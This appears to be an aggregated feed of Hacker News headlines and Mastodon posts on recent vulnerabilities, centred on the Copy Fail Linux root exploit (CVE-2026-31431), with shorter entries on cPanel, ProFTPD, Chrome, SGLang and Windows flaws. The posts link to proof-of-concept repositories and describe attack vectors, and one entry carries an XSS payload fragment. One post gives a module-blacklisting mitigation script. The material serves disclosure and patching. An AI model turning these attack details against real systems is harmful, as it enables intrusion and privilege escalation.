🔖 Title: FastCGI: 30 years old and still the better protocol for reverse proxies
🔗 URL: agwa.name/blog/post/fastcgi_is
👍 Score: [118]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Third Editor Fired in Elsevier's Citation Cartel Crackdown
🔗 URL: chrisbrunet.com/p/third-editor
👍 Score: [101]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Letting AI play my game – building an agentic test harness to help play-testing
🔗 URL: blog.jeffschomay.com/letting-a
👍 Score: [98]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Linux 7.0 Broke PostgreSQL: The Preemption Regression Explained
🔗 URL: read.thecoder.cafe/p/linux-bro
👍 Score: [95]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Copy Fail – CVE-2026-31431
🔗 URL: copy.fail/
👍 Score: [93]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Maryland becomes first state to ban surveillance pricing in grocery stores
🔗 URL: theguardian.com/technology/202
👍 Score: [90]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: GitHub – DOS 1.0: Transcription of Tim Paterson's DOS Printouts
🔗 URL: github.com/DOS-History/Paterso
👍 Score: [85]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: An open-source stethoscope that costs between $2.5 and $5 to produce
🔗 URL: github.com/GliaX/Stethoscope
👍 Score: [81]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Improving ICU handovers by learning from Scuderia Ferrari F1 team
🔗 URL: healthmanagement.org/c/icu/Iss
👍 Score: [46]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Laws of UX
🔗 URL: lawsofux.com/
👍 Score: [37]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Ramp's Sheets AI Exfiltrates Financials
🔗 URL: promptarmor.com/resources/ramp
👍 Score: [31]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: How to Build the Future: Demis Hassabis [video]
🔗 URL: youtube.com/watch?v=JNyuX1zoOgU
👍 Score: [31]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: A new benchmark for testing LLMs for deterministic outputs
🔗 URL: interfaze.ai/blog/introducing-
👍 Score: [26]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

hnbot@chrispelli.fun at 2026-04-29T18:25:05.000Z ##

Copy Fail – CVE-2026-31431 - copy.fail/

#hackernews

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan@infosec.exchange at 2026-04-29T22:43:47.000Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

copy.fail/

##

marshray@infosec.exchange at 2026-04-29T22:21:07.000Z ##

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb@infosec.exchange at 2026-04-29T22:15:16.000Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

security-tracker.debian.org/tr

##

cR0w@infosec.exchange at 2026-04-29T21:55:48.000Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne@infosec.exchange at 2026-04-29T21:46:01.000Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

security-tracker.debian.org/tr

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

github.com/theori-io/copy-fail

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

Origin | Interest | Match ##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily@infosec.exchange at 2026-04-29T20:32:32.000Z ##

@mttaggart And yet RHEL has "fix deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily@infosec.exchange at 2026-04-29T20:31:18.000Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

copy.fail

security-tracker.debian.org/tr

ubuntu.com/security/CVE-2026-3

suse.com/security/cve/CVE-2026

#copyfail

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

xint.io/blog/copy-fail-linux-d

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
news.ycombinator.com/item?id=4

#hackernews #tech

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: copy.fail/
Comments: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

CVE-2026-6849
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T21:13:30.563000

2 posts

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

1 repos

https://github.com/osmancanvural/CVE-2026-6849

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7426
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T20:16:32.143000

2 posts

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a prefix length value exceeding the maximum valid length, resulting in a heap buffer overflow. Users processing IPv4 RA only are not impacted. To mitigat

thehackerwire@mastodon.social at 2026-04-29T23:00:22.000Z ##

🟠 CVE-2026-7426 - High (8.1)

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:00:22.000Z ##

🟠 CVE-2026-7426 - High (8.1)

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7466
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T19:16:27.013000

2 posts

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7424
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T19:16:26.743000

2 posts

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (permanent IP task freeze requiring hardware reset) by sending a single crafted DHCPv6 packet. The issue is present whenever DHCPv6 is enabled.

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41940
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T19:16:23.930000

7 posts

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.

2 repos

https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker

https://github.com/Sachinart/CVE-2026-41940-cpanel-0day

AlesandroOrtiz at 2026-04-29T22:32:03.430Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

glitterbean@wehavecookies.social at 2026-04-29T19:24:20.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) labs.watchtowr.com/the-interne

##

threatcodex at 2026-04-29T18:11:35.993Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)

labs.watchtowr.com/the-interne

##

_r_netsec at 2026-04-29T17:28:05.206Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs labs.watchtowr.com/the-interne

##

AlesandroOrtiz@infosec.exchange at 2026-04-29T22:32:03.000Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

threatcodex@infosec.exchange at 2026-04-29T18:11:35.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
labs.watchtowr.com/the-interne

##

_r_netsec@infosec.exchange at 2026-04-29T17:28:05.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs labs.watchtowr.com/the-interne

##

CVE-2026-0204
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:42

2 posts

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5712
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:41

2 posts

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7344
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-29T15:31:44

1 posts

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T01:30:26.000Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #Cybersecurity

##

CVE-2026-7343
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-04-29T15:31:43

1 posts

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T00:00:40.000Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vulnerability #Security

##

CVE-2026-5760
(9.8 CRITICAL)

EPSS: 0.38%

updated 2026-04-29T15:31:38

2 posts

SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) when a model file containing a malcious tokenizer.chat_template is loaded, as the Jinja2 chat templates are rendered using an unsandboxed jinja2.Environment().

1 repos

https://github.com/Stuub/SGLang-0.5.9-RCE

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

CVE-2026-42515(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-29T09:30:25

2 posts

This vulnerability exists in e-Sushrut due to improper access control in resource access validation. An authenticated attacker could exploit this vulnerability by manipulating parameter in the API request URL to gain unauthorized access to sensitive information of patients on the targeted system.

offseq at 2026-04-29T09:00:29.510Z ##

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-29T09:00:29.000Z ##

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. radar.offseq.com/threat/cve-20 #OffSeq #Healthcare #CVE #Security

##

CVE-2026-42615
(7.2 HIGH)

EPSS: 0.01%

updated 2026-04-29T06:33:35

2 posts

GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.

cR0w@infosec.exchange at 2026-04-29T04:41:24.000Z ##

RE: infosec.exchange/@cR0w/1164832

lol

cve.org/CVERecord?id=CVE-2026-

##

offseq@infosec.exchange at 2026-04-29T04:30:25.000Z ##

🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. radar.offseq.com/threat/cve-20 #OffSeq #CyberChef #XSS

##

CVE-2026-7321
(9.7 CRITICAL)

EPSS: 0.04%

updated 2026-04-29T06:33:30

2 posts

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

Matchbook3469@mastodon.social at 2026-04-29T15:21:48.000Z ##

⛔ New security advisory:

CVE-2026-7321 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #ZeroDay #ThreatIntel

##

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23773
(4.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-29T04:16:40.867000

1 posts

Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.

offseq@infosec.exchange at 2026-04-29T06:00:26.000Z ##

MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. radar.offseq.com/threat/cve-20 #OffSeq #SSRF #Dell #Cybersecurity

##

CVE-2026-41873
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-04-29T00:31:25

2 posts

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As

Matchbook3469@mastodon.social at 2026-04-29T11:45:34.000Z ##

🚨 New security advisory:

CVE-2026-41873 affects Apache Pony Mail.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#CVE #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42167
(8.1 HIGH)

EPSS: 0.24%

updated 2026-04-29T00:30:29

5 posts

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

2 repos

https://github.com/dinosn/proftpd-CVE-2026-42167-analysis

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc

Tinolle at 2026-04-29T18:25:57.814Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
zeropath.com/blog/proftpd-cve-

##

threatcodex at 2026-04-29T14:17:39.181Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD

zeropath.com/blog/proftpd-cve-

##

Tinolle@infosec.exchange at 2026-04-29T18:25:57.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
zeropath.com/blog/proftpd-cve-

##

threatcodex@infosec.exchange at 2026-04-29T14:17:39.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
zeropath.com/blog/proftpd-cve-

##

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32202
(4.3 MEDIUM)

EPSS: 7.19%

updated 2026-04-28T21:37:03

13 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

AAKL at 2026-04-29T16:54:57.114Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis

##

cyberveille@mastobot.ping.moi at 2026-04-29T14:30:25.000Z ##

📢 CVE-2026-32202 : faille Windows Shell activement exploitée, liée à APT28
📝 ## 🗓️ Contexte

Publié le 28 avril 2026 par The Cyber Security Hub sur LinkedIn, cet article rapporte la confirmation par Microsoft de l'e...
📖 cyberveille : cyberveille.ch/posts/2026-04-2
🌐 source : linkedin.com/pulse/warning-win
#APT28 #CVE_2026_21510 #Cyberveille

##

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

captechgroup.com/about-us/thre

##

cyberveille@mastobot.ping.moi at 2026-04-29T12:30:26.000Z ##

📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte

Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : cyberveille.ch/posts/2026-04-2
🌐 source : akamai.com/blog/security-resea
#APT28 #CVE_2026_21510 #Cyberveille

##

beyondmachines1 at 2026-04-29T11:01:43.821Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**

beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 it-connect.fr/vols-didentifian #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T11:01:43.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

